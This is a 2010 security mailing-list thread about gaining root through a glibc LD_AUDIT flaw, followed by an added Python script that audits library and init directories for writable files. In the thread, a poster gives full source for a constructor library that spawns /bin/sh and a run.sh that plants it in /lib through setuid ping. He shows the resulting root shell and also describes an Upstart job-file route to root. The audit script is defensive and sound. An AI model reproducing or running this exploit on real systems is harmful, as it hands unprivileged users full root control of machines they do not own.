Hi,

One should be safe because users need admin rights to write there, but
playing with setuid binaries is always dangerous.

This could be enforced by implementing a 'secure level' in the kernel,
but then the maintenance of the system could be a nightmare. Imagine
having to reboot a critical server just because the 'secure level' must
be disabled in order to install patches :)

Regards,

Xavier Garcia

On Tue, Nov 09, 2010 at 09:57:37AM -0500, Nicholas B. wrote:
> One would hope a system didn't allow just anyone to write to /lib/
>
> On Tue, Nov 9, 2010 at 4:43 AM, Xavier Garcia <[email protected]> wrote:
>
> > Hi guys,
> >
> > I finally found an easier way to gain root privileges, without
> > rebooting the computer.
> >
> > The vulnerability can be used to upload a custom library to the
> > server and then execute a root shell.
> >
> > The library is really simple (libevil.so)
> >
> > ----
> >
> > #include <errno.h>
> > #include <unistd.h>
> >
> > static void
> > __attribute__ ((constructor))
> > install (void)
> > {
> >     execl("/bin/sh", "/bin/sh", (char *) 0);
> > }
> >
> > ----
> >
> > u...@host:~/$ cat ./run.sh
> >
> > umask 0
> > gcc -c -fPIC evil.c -o evil.o
> > gcc -shared -Wl,-soname,libevil.so.1 -o libevil.so evil.o
> > LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/lib/libevil.so" ping
> > cat ./libevil.so > /lib/libevil.so
> > LD_AUDIT="libevil.so" ping
> >
> > u...@host:~/$ sh run.sh
> > ERROR: ld.so: object 'libpcprofile.so' cannot be loaded as audit
> > interface: undefined symbol: la_version; ignored.
> > Usage: ping [-LRUbdfnqrvVaAD] [-c count] [-i interval] [-w deadline]
> >             [-p pattern] [-s packetsize] [-t ttl] [-I interface]
> >             [-M pmtudisc-hint] [-m mark] [-S sndbuf]
> >             [-T tstamp-options] [-Q tos] [hop1 ...] destination
> > # whoami
> > root
> > #
> >
> > I hope it is helpful.
> >
> > Regards,
> >
> > Xavier Garcia
> >
> > On Fri, Nov 05, 2010 at 12:11:32PM +0100, Xavier Garcia wrote:
> > > Hi guys,
> > >
> > > I am trying to find some ways to gain root access by using the
> > > vulnerability described in the advisory
> > >
> > > http://marc.info/?l=full-disclosure&m=128776663124692&w=2
> > >
> > > published by Tavis Ormandy.
> > >
> > > The advisory states that Cron can be used to escalate privileges,
> > > but Cron does not accept files that are writable by the group or
> > > others, returning the error BAD FILE MODE.
> > >
> > > I have been looking for alternative ways to gain root access, but
> > > there are not many places where it is possible.
> > >
> > > I have found that Upstart (http://en.wikipedia.org/wiki/Upstart)
> > > does not check the permissions and happily reads the
> > > configuration files every time it restarts. This means that we can
> > > create a configuration file that will instruct Upstart to
> > > drop a root shell :)
> > >
> > > The down side is that we have to be patient and wait until the
> > > computer is rebooted, or use some social engineering.
> > >
> > > You can find more details at
> > >
> > > http://www.shellguardians.com/2010/11/privilege-escalation-with-upstart-and.html
> > >
> > > I hope this finding is interesting or useful for the list.
> > >
> > > Regards,
> > >
> > > Xavier Garcia
> >
> > _______________________________________________
> > Pauldotcom mailing list
> > [email protected]
> > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
> > Main Web Site: http://pauldotcom.com
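The thread turns on one condition: a directory that a privileged process trusts (the loader's library paths, Upstart's job directory) being writable by an ordinary user, or containing a file that is. Nicholas's reply is the check a defender actually wants to run, and the `umask 0` in the posted run.sh is what makes the dropped library stand out as world-writable. The following is an added example, not code from this thread or from any of the projects mentioned: a small Python audit that walks a directory tree and flags entries that are group-writable, world-writable, or not owned by the expected uid. The `TRUSTED_DIRS` list is an illustrative assumption, not a complete list for any distribution, and `build_sandbox` creates constructed test data in a temporary directory so the script runs offline without touching a real `/lib`.

```python
import os
import shutil
import stat
import tempfile

# Directories a privileged process trusts: the dynamic loader's library
# paths and Upstart's job directory. Illustrative defaults (an assumption
# of this example), not a complete list for any particular distribution.
TRUSTED_DIRS = ["/lib", "/usr/lib", "/etc/init", "/etc/ld.so.conf.d"]


def classify(mode, uid, expected_uid=0):
    """Return issue codes for one inode, given its st_mode and st_uid.

    "unexpected-owner": owned by someone other than expected_uid (root).
    "group-writable":   group write bit set.
    "world-writable":   other write bit set.
    A sticky directory (mode 1777 like /tmp) is tolerated for both write
    bits, because the sticky bit stops users replacing each other's files.
    """
    issues = []
    if uid != expected_uid:
        issues.append("unexpected-owner")
    sticky_dir = stat.S_ISDIR(mode) and bool(mode & stat.S_ISVTX)
    if mode & stat.S_IWGRP and not sticky_dir:
        issues.append("group-writable")
    if mode & stat.S_IWOTH and not sticky_dir:
        issues.append("world-writable")
    return issues


def check_path(path, expected_uid=0):
    """lstat one path (judging a symlink's own metadata, not its target)
    and return a list of (path, issue) pairs."""
    st = os.lstat(path)
    return [(path, issue) for issue in classify(st.st_mode, st.st_uid, expected_uid)]


def audit_tree(root, expected_uid=0):
    """Collect findings for root and everything beneath it. A missing
    directory yields no findings rather than an exception, since not every
    host has every entry of TRUSTED_DIRS."""
    findings = []
    if not os.path.lexists(root):
        return findings
    findings.extend(check_path(root, expected_uid))
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            findings.extend(check_path(os.path.join(dirpath, name), expected_uid))
    return findings


def build_sandbox():
    """Constructed test data: a throwaway directory imitating a library
    directory with one correctly permissioned file, one file left
    world-writable the way a `umask 0` drop leaves it, and one
    group-writable subdirectory. Returns the sandbox path."""
    root = tempfile.mkdtemp(prefix="libaudit-")
    os.chmod(root, 0o755)
    good = os.path.join(root, "libgood.so.1")
    with open(good, "wb") as fh:
        fh.write(b"\x7fELF")          # file content is irrelevant to the check
    os.chmod(good, 0o644)
    dropped = os.path.join(root, "libdropped.so")
    with open(dropped, "wb") as fh:
        fh.write(b"\x7fELF")
    os.chmod(dropped, 0o666)
    sub = os.path.join(root, "modules")
    os.mkdir(sub)
    os.chmod(sub, 0o775)
    return root


def demo():
    """Audit the constructed sandbox and return stable, sorted findings as
    (relative path, issue) pairs. The sandbox is owned by the current user,
    so that uid is the expected owner here; on a real host the default of
    uid 0 applies."""
    root = build_sandbox()
    try:
        findings = audit_tree(root, expected_uid=os.getuid())
    finally:
        shutil.rmtree(root)
    return sorted((os.path.relpath(p, root), issue) for p, issue in findings)


if __name__ == "__main__":
    for path, issue in demo():
        print(f"{issue:17s} {path}")
    # On a real host, run as root against the trusted directories instead:
    # for d in TRUSTED_DIRS:
    #     for path, issue in audit_tree(d):
    #         print(f"{issue:17s} {path}")
```

The audit uses `lstat` deliberately: a symlink planted in a trusted directory is itself a finding, and judging the link target instead would let an attacker-controlled target mask the link. Run it from a cron job or a configuration-management check and treat any finding in a loader path or init directory as a priority, since the thread shows that a single writable file there is enough to go from an unprivileged user to root.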
